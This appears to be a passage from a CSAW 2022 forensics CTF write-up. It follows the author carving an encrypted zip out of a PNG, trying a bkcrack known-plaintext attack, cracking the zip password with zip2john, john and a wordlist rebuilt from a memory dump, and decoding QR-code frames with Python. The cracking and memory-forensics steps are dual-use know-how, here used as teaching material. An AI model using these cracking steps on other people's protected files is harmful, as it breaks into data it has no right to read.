&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Check readme&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~/csaw/dir2$ &lt;span class=&#34;built_in&#34;&gt;cat&lt;/span&gt; readme.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Do you know GPG? So just &lt;span class=&#34;keyword&#34;&gt;do&lt;/span&gt; it to decipher!!!&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Ah man! We know that! We need to decrypt the gpg files. But wait! where is the  &lt;code&gt;end.zip.gpg&lt;/code&gt;  file!&lt;br&gt;
Ok it’s not important for me! I guess  &lt;code&gt;findme.txt.gpg&lt;/code&gt;  is the flag! Let’s decipher it with  &lt;code&gt;gpg&lt;/code&gt;  command line utility. Of course we will use  &lt;code&gt;1m_4n_4dul7_n0w&lt;/code&gt;  password!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;test&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~/csaw/dir2$ gpg --output findme.txt --decrypt findme.txt.gpg &lt;span class=&#34;comment&#34;&gt;# it will ask you for a password&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~/csaw/dir2$ &lt;span class=&#34;built_in&#34;&gt;cat&lt;/span&gt; findme.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;The flag is not here of course !!!&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;You must find it :-)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Troll one day troll always ........&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Ah man ! I don’t find the flag! OK still the  &lt;code&gt;end.zip.gpg&lt;/code&gt; ! Let’s find this, i guess it’s hiding in  &lt;code&gt;end.png&lt;/code&gt;  image&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Investigate end.png&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~/csaw/dir2$ sudo binwalk end.png &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;DECIMAL       HEXADECIMAL     DESCRIPTION&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;--------------------------------------------------------------------------------&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0             0x0             PNG image, 850 x 300, 8-bit/color RGB, non-interlaced&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;320           0x140           Zlib compressed data, best compression&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;917           0x395           Zlib compressed data, best compression&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;493886        0x7893E         Zip archive data, at least v2.0 to extract, compressed size: 61917, uncompressed size: 61907, name: end.zip.gpg&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;555953        0x87BB1         End of Zip archive, footer length: 22&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Finally we found it, let’s use  &lt;code&gt;foremost&lt;/code&gt;  command to extract our target !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Investigate end.png&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~/csaw/dir2$ foremost end.png   &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Processing: end.png&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;|foundat=end.zip.gpgUT&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;*|&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;A new directory called  &lt;code&gt;output&lt;/code&gt;  is created and it contains the extracted files from  &lt;code&gt;end.png&lt;/code&gt;  using&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Investigate end.png&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~/csaw/dir2$ tree output&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;output&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;├── audit.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;├── png&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;│   └── 00000000.png&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;└── zip&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    └── 00000964.zip&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2 directories, 3 files&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;OK let’s unzip the  &lt;code&gt;00000964.zip&lt;/code&gt;  file and decipher the  &lt;code&gt;end.zip.gpg&lt;/code&gt;  file using  &lt;code&gt;Troll_Tr0ll_TrOll&lt;/code&gt;  password and get our flag&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Investigate end.png&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~/csaw/dir2$ unzip output/zip/00000964.zip &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Archive:  output/zip/00000964.zip&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  inflating: end.zip.gpg&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~/csaw/dir2$ gpg --output end.zip --decrypt end.zip.gpg&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Ah finally there is a flag.gif file in end.zip file but wait!! the zip file is protected!&lt;/p&gt;
&lt;p&gt;We’ve noticed that the encryption is ZipCrypto Deflate which is similar to the other chall, crackable by just knowing 12 bytes of whats inside the zip, 8 of which must be contiguous.&lt;br&gt;
We’ve went ahead, used the header of a GIF file, and digging more into the GIF file structure, we’ve came to know that in most of the GIF files there is a constant text ‘NETSCAPE’ at the hexadecimal offset 0x310 which fulfills our needs, 8 bytes contiguous plus the header, we’ve got more than 12 bytes.&lt;/p&gt;
&lt;p&gt;The header is just  &lt;code&gt;GIF89a&lt;/code&gt;  at offset 0x0.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/RH9goSf.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;You can get bkcrack from &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9naXRodWIuY29tL2tpbWNpODYvYmtjcmFjaw==&#34;&gt;here&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;-C to specify the ciphered zip, -c for the target file -x to specify known bytes at some offset and -d to get the deciphered data once the process is done, and keys were found!&lt;/p&gt;
&lt;figure class=&#34;highlight plaintext&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;./bkcrack -C end.zip -c flag.gif -x 0 474946383961 -x 0x310 4E4554534415045322E30 -d deciphered&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Unfortunately, it ended with  &lt;code&gt;Could Not find the keys.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;However we were not lucky to crack the zip open using bkcrack again.&lt;/p&gt;
&lt;p&gt;Don’t worry dude! we have rockyou and john! Let’s give bruteforcing a chance. We can extract the password hash with  &lt;code&gt;zip2john&lt;/code&gt;  command!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Extract the hash of the password&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~/mnt/dir2$ zip2john end.zip &amp;gt; zip.hash  &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;ver 2.0 efh 5455 efh 7875 end.zip/flag.gif PKZIP Encr: TS_chk, cmplen=61563, decmplen=90082, crc=18A1C7A3 ts=8050 cs=8050 &lt;span class=&#34;built_in&#34;&gt;type&lt;/span&gt;=8&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now it’s time to bruteforce the hash with rockyou!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Extract the hash of the password&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~/mnt/dir2$ john --wordlist=&lt;span class=&#34;variable&#34;&gt;$rockyou&lt;/span&gt; zip.hash&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Using default input encoding: UTF-8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Loaded 1 password &lt;span class=&#34;built_in&#34;&gt;hash&lt;/span&gt; (PKZIP [32/64])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;No password hashes left to crack (see FAQ)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Wait what??? The password wasn’t found on rockyou! What the hack?? After some investigating we remember that there is a text file called  &lt;code&gt;dic_fr_l33t.txt&lt;/code&gt; ! dic means dictionary and fr means french right ? Oh man we need to recover this wordlist! But the user deleted it. I’ll give a chance to  &lt;code&gt;linux_find_file&lt;/code&gt; . Let’s try to dump this text file. It might be stil loaded in the memory right?&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Extract the hash of the password&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~$ vol.py -f memory.raw --profile=LinuxUbuntu1604-lowx64 linux_find_file -L | grep dic_fr&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Volatility Foundation Volatility Framework 2.6.1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3 0xffff88000c135cd8 /media/sf_DUMP/dir1/dic_fr_l33t.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;vol.py -f memory.raw --profile=LinuxUbuntu1604-lowx64 linux_find_file -i 0xffff88000c135cd8 -O dic_fr_l33t.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Volatility Foundation Volatility Framework 2.6.1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Ah God! The extracted file is empty. We need another way to recover the wordlist and with an elegent way&lt;br&gt;
After some minutes of thinking. We decide to use a regex that allow us to collect words that not contains special chars like  &lt;code&gt;&amp;#123;_;&amp;#125;/][-&lt;/code&gt;&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Extract the hash of the password&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~$ strings memory.raw | grep -v &lt;span class=&#34;string&#34;&gt;&amp;quot; \|\_\|\-\|\[\|\]\|\`\|\;\|\/\|\.\|\&amp;#125;\|\&amp;#123;&amp;quot;&lt;/span&gt; | &lt;span class=&#34;built_in&#34;&gt;sort&lt;/span&gt; | &lt;span class=&#34;built_in&#34;&gt;uniq&lt;/span&gt; | &lt;span class=&#34;built_in&#34;&gt;sort&lt;/span&gt; &amp;gt; myrock.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~/mnt/dir2$ sudo john --wordlist=~/myrock.txt zip.hash&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Using default input encoding: UTF-8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Loaded 1 password &lt;span class=&#34;built_in&#34;&gt;hash&lt;/span&gt; (PKZIP [32/64])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Will run 8 OpenMP threads&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Press &lt;span class=&#34;string&#34;&gt;&amp;#x27;q&amp;#x27;&lt;/span&gt; or Ctrl-C to abort, almost any other key &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; status&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Cyb3rs3curit3    (end.zip/flag.gif)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;1g 0:00:00:00 DONE (2022-09-12 20:34) 6.666g/s 655360p/s 655360c/s 655360C/s Coup3ri3z..D3fouraillions&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Use the &lt;span class=&#34;string&#34;&gt;&amp;quot;--show&amp;quot;&lt;/span&gt; option to display all of the cracked passwords reliably&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Session completed.&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Oh man we did it! The password of the protected  &lt;code&gt;end.zip&lt;/code&gt;  is  &lt;code&gt;Cyb3rs3curit3&lt;/code&gt;  (CyberSecurité).Let’s extract the  &lt;code&gt;flag.gif&lt;/code&gt;  file now…&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/jZoDJhE.gif&#34; alt=&#34;&#34;&gt;&lt;br&gt;
Let’s convert this gif to frames using  &lt;code&gt;ffmpeg&lt;/code&gt;  utility, the magical one xD&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Split the gif&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~$ &lt;span class=&#34;built_in&#34;&gt;mkdir&lt;/span&gt; temp ; ffmpeg -i /mnt/dir2/flag.gif -vsync 0 temp/temp%d.png&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Input &lt;span class=&#34;comment&#34;&gt;#0, gif, from &amp;#x27;flag.gif&amp;#x27;:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  Duration: 00:00:03.60, start: 0.000000, bitrate: 200 kb/s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  Stream &lt;span class=&#34;comment&#34;&gt;#0:0: Video: gif, bgra, 290x290, 10 fps, 10 tbr, 100 tbn&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Stream mapping:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  Stream &lt;span class=&#34;comment&#34;&gt;#0:0 -&amp;gt; #0:0 (gif (native) -&amp;gt; png (native))&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Press [q] to stop, [?] &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;help&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Output &lt;span class=&#34;comment&#34;&gt;#0, image2, to &amp;#x27;temp/temp%d.png&amp;#x27;:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  Metadata:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    encoder         : Lavf59.27.100&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  Stream &lt;span class=&#34;comment&#34;&gt;#0:0: Video: png, rgba(pc, gbr/unknown/unknown, progressive), 290x290, q=2-31, 200 kb/s, 10 fps, 10 tbn&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    Metadata:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      encoder         : Lavc59.37.100 png&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;frame=   36 fps=0.0 q=-0.0 Lsize=N/A time=00:00:03.60 bitrate=N/A speed=14.8x&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;video:113kB audio:0kB subtitle:0kB other streams:0kB global headers:0kB muxing overhead: unknown&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;We got this images! oh we have 36 QR Code images! Seriously i don’t want to scan it manually!&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/aFiEzTR.png&#34; alt=&#34;&#34;&gt;&lt;br&gt;
Let’s Write a small code that reads all these QRcode images! I am too lazy man !&lt;/p&gt;
&lt;figure class=&#34;highlight python&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Scan QRCode&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; cv2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;flag=&lt;span class=&#34;string&#34;&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;number&#34;&gt;36&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    img=cv2.imread(&lt;span class=&#34;string&#34;&gt;&amp;quot;temp&amp;quot;&lt;/span&gt;+&lt;span class=&#34;built_in&#34;&gt;str&lt;/span&gt;(i+&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;)+&lt;span class=&#34;string&#34;&gt;&amp;quot;.png&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    det=cv2.QRCodeDetector()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    val, pts, st_code=det.detectAndDecode(img)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    flag+=val[::-&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;print&lt;/span&gt;(flag)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s run the code now ! I wish this nightmare finish dude! I don’t another step please&lt;/p&gt;
